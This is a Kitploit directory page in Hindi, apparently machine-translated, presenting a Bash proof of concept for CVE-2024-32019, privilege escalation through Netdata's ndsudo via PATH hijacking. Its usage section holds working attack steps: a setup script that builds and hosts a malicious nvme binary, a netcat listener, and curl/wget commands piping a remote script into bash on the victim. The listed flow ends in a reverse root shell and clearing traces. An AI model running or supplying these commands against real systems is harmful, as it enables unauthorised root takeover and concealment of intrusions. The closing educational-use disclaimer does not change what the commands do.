Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32019-PoC — "ndsudo" (Netdata स्थानीय शोषण) के माध्यम से विशेषाधिकार वृद्धि के लिए Bash स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/80ottanta80/cve-2024-32019-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHub80ottanta80/cve-2024-32019-poc

CVE-2024-32019-PoC

"ndsudo" (Netdata स्थानीय शोषण) के माध्यम से विशेषाधिकार वृद्धि के लिए Bash स्क्रिप्ट

रिपॉजिटरी देखें
110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-32019-प्रूफ ऑफ कॉन्सेप्ट

Bash स्क्रिप्ट जो "ndsudo" (Netdata स्थानीय शोषण) के माध्यम से विशेषाधिकार वृद्धि के लिए है।

Netdata प्रभावित संस्करण

  • >= v1.45.0, < v1.45.3

  • >= v1.44.0-60, < v1.45.0-169

भेद्यता विवरण

ndsudo उपकरण बाहरी आदेशों का एक प्रतिबंधित सेट चलाता है, लेकिन खोज पथ "PATH" पर्यावरण चर द्वारा प्रदान किए जाते हैं।

हमारे पास पहुंच वाले पथ पर "PATH" पर्यावरण चर को बदलकर, हम नियंत्रित कर सकते हैं कि ndsudo कमांड को कहाँ खोजे और एक मैलिशियस कोड वाला कमांड बना सकते हैं।

प्रूफ ऑफ कॉन्सेप्ट

यह शोषण इस धारणा पर आधारित है कि लक्ष्य मशीन और हमलावर मशीन एक ही नेटवर्क पर हैं।

पूर्वापेक्षाएँ

हमलावर मशीन

  • पोर्ट 4444 पर श्रोता
  • मैलिशियस nvme बाइनरी होस्ट करने वाला वेब सर्वर

लक्ष्य मशीन:

  • स्थानीय शेल पहुँच
  • ndsudo निष्पादित करने की अनुमति
  • पेलोड डाउनलोड के लिए wget/curl/कोई भी HTTP क्लाइंट

उपयोग

हमलावर मशीन पर

हम "setup_exploit_server.sh" चलाकर हमले के लिए आवश्यक फ़ाइल स्वचालित रूप से उत्पन्न और तैनात कर सकते हैं

root@kitploit:~
$ ./setup_exploit_server.sh YOUR_IP

--------- Exploit Infrastructure Setup by Ottanta ---------

[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444

Press Enter to stop the web server and clean up...

यह स्क्रिप्ट आपके आईपी पते के साथ कॉन्फ़िगर की गई हमले के लिए आवश्यक सभी फ़ाइलें बनाएगी।

अपना वेब सर्वर तैनात करने के बाद हम दूसरे शेल पर एक श्रोता प्रारंभ करते हैं:

root@kitploit:~
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...

लक्ष्य मशीन पर

हमारे HTTP क्लाइंट के आधार पर हम अपने शोषण को डाउनलोड और निष्पादित कर सकते हैं।

root@kitploit:~
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

यदि सब कुछ सही ढंग से किया गया है तो हमारे पास अब एक रूट शेल होना चाहिए।

वैकल्पिक पाठ

शोषण प्रवाह

  1. /tmp/exploit/ पर मैलिशियस बाइनरी डाउनलोड करता है
  2. नियंत्रित निर्देशिका को प्राथमिकता देने के लिए PATH को संशोधित करता है
  3. ndsudo nvme-list निष्पादित करता है जो मैलिशियस बाइनरी चलाता है
  4. हमलावर मशीन पर रिवर्स शेल स्थापित करता है
  5. निशान साफ करता है

संदर्भ

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
  • https://nvd.nist.gov/vuln/detail/CVE-2024-32019

कानूनी अस्वीकरण

यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है।

लेखक इस जानकारी के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।

टूल डाउनलोड करें